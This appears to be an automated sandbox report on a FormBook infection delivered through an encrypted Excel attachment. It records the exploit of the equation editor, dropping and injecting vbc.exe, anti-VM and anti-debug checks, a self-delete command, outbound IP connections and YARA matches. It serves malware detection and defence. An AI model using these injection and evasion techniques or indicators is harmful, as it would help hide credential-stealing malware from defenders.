Source: C:\Users\Public\vbc.exe	Code function: String function: 00E0E2A8 appears 38 times

Source: 00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.340ea38.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.340ea38.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: explorer.exe, 00000006.00000000.2168635423.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/8@6/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$MT OCEAN STAR ISO 8217 2005.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDAC4.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe {path}
Source: unknown	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: MT OCEAN STAR ISO 8217 2005.xlsx

Static file information: File size 2245120 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: RAServer.pdb^ source: vbc.exe, 00000005.00000002.2192755767.0000000000350000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: vbc.exe, 00000005.00000002.2192755767.0000000000350000.00000040.00000001.sdmp

Source: MT OCEAN STAR ISO 8217 2005.xlsx

Initial sample: OLE indicators vbamacros = False

Source: MT OCEAN STAR ISO 8217 2005.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004168C9 push edi; ret	5_2_00416941
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00416927 push edi; ret	5_2_00416941
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00413A69 push ecx; ret	5_2_00413A6D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CEF2 push eax; ret	5_2_0041CEF8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CEFB push eax; ret	5_2_0041CF62
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CEA5 push eax; ret	5_2_0041CEF8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CF5C push eax; ret	5_2_0041CF62
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00416786 push ecx; retf	5_2_00416798
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E0DFA1 push ecx; ret	5_2_00E0DFB4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0215DFA1 push ecx; ret	7_2_0215DFB4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00096786 push ecx; retf	7_2_00096798
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_000968C9 push edi; ret	7_2_00096941
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00096927 push edi; ret	7_2_00096941
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00093A69 push ecx; ret	7_2_00093A6D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009CEA5 push eax; ret	7_2_0009CEF8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009CEFB push eax; ret	7_2_0009CF62
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009CEF2 push eax; ret	7_2_0009CEF8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009CF5C push eax; ret	7_2_0009CF62

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1]			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1]

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE6

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: MT OCEAN STAR ISO 8217 2005.xlsx

Stream path 'EncryptedPackage' entropy: 7.99991099371 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409A80 rdtsc

5_2_00409A80

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2476	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2800	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2732	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2852	Thread sleep time: -38000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe TID: 2840	Thread sleep time: -55000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: explorer.exe, 00000006.00000000.2162902738.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2169819061.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2169840371.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000006.00000000.2169808295.0000000004226000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD01dRom0
Source: explorer.exe, 00000006.00000000.2169808295.0000000004226000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD01
Source: explorer.exe, 00000006.00000000.2169778426.00000000041DB000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000002.2352944415.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409A80 rdtsc

5_2_00409A80

Source: C:\Users\Public\vbc.exe

Code function: 5_2_0040ACC0 LdrLoadDll,

5_2_0040ACC0

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00E126F8 mov eax, dword ptr fs:[00000030h]		5_2_00E126F8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_021626F8 mov eax, dword ptr fs:[00000030h]		7_2_021626F8

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 52.58.78.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 216.239.32.21 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: A30000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000002.2353088942.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2353114014.0000000000A50000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000002.2353088942.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2353114014.0000000000A50000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2162902738.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.2353088942.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2353114014.0000000000A50000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.340ea38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.340ea38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Spearphishing Link1	Shared Modules1	Path Interception	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery121	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading121	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol122	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
